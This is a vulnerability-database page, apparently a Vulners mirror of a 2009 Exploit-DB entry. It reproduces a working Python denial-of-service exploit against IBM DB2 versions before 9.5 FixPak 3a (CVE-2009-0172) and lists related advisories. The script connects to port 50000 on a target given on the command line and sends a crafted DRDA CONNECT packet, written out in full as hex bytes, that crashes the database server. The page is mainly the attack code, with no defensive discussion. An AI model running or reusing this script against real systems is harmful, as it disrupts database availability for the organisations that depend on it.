Lucene search
+L

IBM DB2 < 9.5 pack 3a - Connect Denial of Service

🗓️ 03 Apr 2009 00:00:00Reported by Dennis YurichevType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

IBM DB2 &lt; 9.5 Pack 3a - Connect Denial of Service by Dennis Yuriche

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2009-0172
16 Jan 200921:30
attackerkb
circl
Circl
CVE-2009-0172
3 Apr 200900:00
circl
checkpoint_advisories
Check Point Advisories
IBM DB2 Database Server CONNECT Request Denial of Service (CVE-2009-0172)
21 Apr 200900:00
checkpoint_advisories
cve
CVE
CVE-2009-0172
16 Jan 200921:00
cve
cvelist
Cvelist
CVE-2009-0172
16 Jan 200921:00
cvelist
euvd
EUVD
EUVD-2009-0181
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-0172
16 Jan 200921:30
nvd
prion
Prion
Code injection
16 Jan 200921:30
prion
# Discovered by Dennis Yurichev <[email protected]>

# DB2TEST database should be present on target system

from sys import *
from socket import *

sockobj = socket(AF_INET, SOCK_STREAM)

sockobj.connect ((argv[1], 50000))

sockobj.send(
"\x00\xBE\xD0\x41\x00\x01\x00\xB8\x10\x41\x00\x7F\x11\x5E\x97\xA8"
"\xA3\x88\x96\x95\x4B\x85\xA7\x85\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\xF0\xF1\xC3\xF4\xF0\xF1\xF1\xF8\xF0\xF0\xF0\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\xF0\xF0"
"\xF0\xF1\xD5\xC1\xD4\xC5\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40"
"\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\xF0\xC4\xC2\xF2\x40\x40\x40\x40"
"\x40\x40\x40\x40\x40\x40\x40\x40\x40\x00\x18\x14\x04\x14\x03\x00"
"\x07\x24\x07\x00\x09\x14\x74\x00\x05\x24\x0F\x00\x08\x14\x40\x00"
"\x08\x00\x0B\x11\x47\xD8\xC4\xC2\xF2\x61\xD5\xE3\x00\x06\x11\x6D"
"\xE7\xD7\x00\x0C\x11\x5A\xE2\xD8\xD3\xF0\xF9\xF0\xF5\xF0\x00\x4A"
"\xD0\x01\x00\x02\x00\x44\x10\x6E\x00\x06\x11\xA2\x00\x09\x00\x16"
"\x21\x10\xC4\xC2\xF2\xE3\xC5\xE2\xE3\x40\x40\x40\x40\x40\x40\x40"
"\x40\x40\x40\x40\x00\x24\x11\xDC\x6F\xC1\x3B\xD4\x3C\x33\xF8\x0C"
"\xC9\x96\x6E\x6C\xCD\xB9\x0A\x2C\x9C\xEC\x49\x2A\x1A\x4D\xCE\x62"
"\x47\x9D\x37\x88\xA8\x77\x23\x43")

sockobj.close()

# milw0rm.com [2009-04-03]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Apr 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.08471
39